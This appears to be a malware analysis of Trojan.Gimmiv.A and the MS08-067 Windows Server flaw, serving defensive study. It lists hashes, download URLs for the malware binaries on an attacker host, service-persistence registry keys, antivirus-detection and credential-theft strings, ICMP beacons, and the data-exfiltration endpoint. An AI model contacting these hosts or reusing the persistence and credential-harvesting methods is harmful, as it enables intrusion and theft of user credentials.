xxyyUpdata=http://ce.10wrj.com/nb1103.exe*
xxyyRemoteHost=

The following files were observed during analysis:

10752 f01fd7ecfce8af65832a3a57d2789fa6 10wrjcenew.exe
12800 0f7d9c87b0ce1fa520473119752c6f79 3EDFB6D2
900 14c9db2b8177ca199f283e644fcda225 mimi.1268772
404992 0fdb364e8666140d4570d24f363d26d5 nb1103.exe
258048 944b1a83ee17db7fa779a2e7d970768c pp.gif

MS08-067 and Trojan.Gimmiv.A

On 24 October 2008, Microsoft released an out-of-cycle patch that addressed a stack buffer overflow vulnerability in the Microsoft Windows Server service MS08-067, CVE-2008-4250. Per Microsoft, "This security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit."

Public exploit code and malware began circulating as soon as the patch was released. Microsoft and Symantec provided analysis on malware known as Gimmiv.A. The malware harvests and exfiltrates system information and is able to scan and exploit the MS08-067 vulnerability. The following provides analysis findings for Gimmiv.A.

Site 59.106.145.58 (JP) was found to host nine Gimmiv.A binaries, n*1-9.

http[:]// 59.106.145.58/n*.exe

dc3fdfde66fffb6cfbec946a237787d8 397312 59.106.145.58/n1.exe
f173007fbd8e2190af3be7837acd70a4 397312 59.106.145.58/n2.exe
3ee354cc8b63b8849b28e6f376f2b263 397312 59.106.145.58/n3.exe
6c3e53864541bb13fa7853f7b580b807 397312 59.106.145.58/n4.exe
24cd978da62cff8370b83c26e134ff4c 397312 59.106.145.58/n5.exe
86d75ae361637a8f9114bb3a40f710d3 397312 59.106.145.58/n6.exe
ee70f981514803e1fb4e6b65f492a56d 397312 59.106.145.58/n7.exe
8d66f28d028a4838d09ce4b91d35b7cb 397312 59.106.145.58/n8.exe
477aac8d472a7bea8b906718a2f50c67 397312 59.106.145.58/n9.exe

The malware n2.exe was analyzed as an example.

n2.exe creates c:\WINDOWS\system32\wbem\sysmgr.dll

sysmgr.dll
1cdc67b1d55e9a2d30c0dba193375c11
336384 bytes

The following registry keys are created to install the malware as a service.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
"sysmgr" = sysmgr
"DisplayName" = System Maintenance Service
"ErrorControl" = 0
"ImagePath" = %SystemRoot%\System32\svchost.exe -k sysmgr
"ObjectName" = LocalSystem
"Start" = 2
"Type" = 10, 01, 00, 00

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Enum
"0" = Root\LEGACY_SYSMGR\0000
"Count" = 1
"NextInstance" = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Parameters
"ServiceDll" = C:\WINDOWS\System32\wbem\sysmgr.dll
"ServiceMain" = ServiceMainFunc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Security
"Security" = binary data

The malware searches the registry for the presence of installed antivirus programs and active processes for avp.exe and dwm.exe.

0002549C 1002549C 0 SOFTWARE\BitDefender
000254B4 100254B4 0 avp.exe
000254BC 100254BC 0 SOFTWARE\Jiangmin
000254D8 100254D8 0 SOFTWARE\KasperskyLab
000254F0 100254F0 0 SOFTWARE\Kingsoft
00025504 10025504 0 SOFTWARE\Symantec\PatchInst\NIS
00025524 10025524 0 SOFTWARE\Microsoft\OneCare Protection
0002554C 1002554C 0 SOFTWARE\rising
0002555C 1002555C 0 SOFTWARE\TrendMicro
00025574 10025574 0 dwm.exe

The malware sysmgr.dll sends ICMP Echo requests to 202.108.22.44 and 64.233.189.147. An Echo reply was returned from 64.233.189.147.

Source Destination Protocol Info
192.168.0.13 202.108.22.44 ICMP Echo (ping) request
192.168.0.13 64.233.189.147 ICMP Echo (ping) request
64.233.189.147 192.168.0.13 ICMP Echo (ping) reply

The ICMP packet contains a string of characters abcde12345fghij6789.

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 30 00 81 00 00 80 01 98 fe c0 a8 00 0d ca 6c .0.............l
0020 16 2c 08 00 ba 5f 02 00 02 00 61 62 63 64 65 31 .,..._....abcde1
0030 32 33 34 35 66 67 68 69 6a 36 37 38 39 00 23 45 fghij6789.

The binary strings of sysmgr.dll reveal the ICMP string and a third IP 212.227.93.146

00039018 00439018 0 abcde12345fghij6789
00039030 00439030 0 212.227.93.146
00039070 00439070 0 64.233.189.147
00039090 00439090 0 202.108.22.44

202.108.22.44 (CN)
Reverse lookup xd-22-44-a8.bta.net.cn

64.233.189.147 (US)
Reverse lookup hk-in-f147.google.com

212.227.93.146 (DE)
Reverse lookup s167748465.websitehome.co.uk

The malware captures host information such as IP address and hostname and credentials from Outlook Express and Protected Storage.

00025E04 10025E04 0 Username
00025E10 10025E10 0 82BD0E67-9FEA-4748-8672-D5EFE5B779B0
00025E38 10025E38 0 Advapi32.dll
00025E48 10025E48 0 CredEnumerate
00025E58 10025E58 0 CredFree
00025E64 10025E64 0 Passport.Net\*
00025E74 10025E74 0 pstorec.dll
00025E80 10025E80 0 PStoreCreateInstance
00025E9C 10025E9C 0 89c39569
00025EA8 10025EA8 0 5e7e8100
00025EB4 10025EB4 0 e161255a
00025EC8 10025EC8 0 StringIndex
00025ED4 10025ED4 0 :String
00025EDC 10025EDC 0 :String
00025EE4 10025EE4 0 http:/
00025EEC 10025EEC 0 https:/
00025EF8 10025EF8 0 ===============Outlook Express===============
00025F28 10025F28 0 ===============Credential Info================
00025F58 10025F58 0 ============Protected Storage Info=============
00025F94 10025F94 0 Pass:
00025F9C 10025F9C 0 URL:
00025FA8 10025FA8 0 GetWebInfo
00025FB4 10025FB4 0 <%s %d> !!! Web ID/Pass Info ERR
00025FE7 10025FE7 0 ksysmgr

The malware exfiltrates the captured information to 59.106.145.58/test2.php?abc=[num]?def=[num]. The abc value represents the installed antivirus version and the def value represents the OS version. The exfiltrated data protected with encrypted with AES encryption.

00025638 10025638 0 ?abc=1
00025648 10025648 0 ?abc=3
00025658 10025658 0 ?abc=4
00025668 10025668 0 ?abc=5
00025678 10025678 0 ?abc=6
00025688 10025688 0 ?abc=7
00025698 10025698 0 ?abc=8
000256A8 100256A8 0 ?abc=9
000256B8 100256B8 0 ?abc=2
000256C8 100256C8 0 ?def=2
000256D8 100256D8 0 ?def=3
000256E8 100256E8 0 ?def=1
000256F8 100256F8 0 ?def=4
00025708 10025708 0 ?def=5

Gimmiv.A attempts to connect to the remote IP address 59.106.145.58 to download a CAB file to %System%\initproc02x.cab. From the CAB file, the trojan extracts the following files:

winbase.dll
basesvc.dll
syicon.dll

311296 82ba009746da8603c463f37e381a42a4 basesvc.dll
200704 60d692fd52098f145e448bd985fcff6d syicon.dll
49152 40cb861ad59c804f340fd8a2a28e226c winbase.dll

The additional dlls provide the functionality of scanning and exploiting the MS08-067 vulnerability.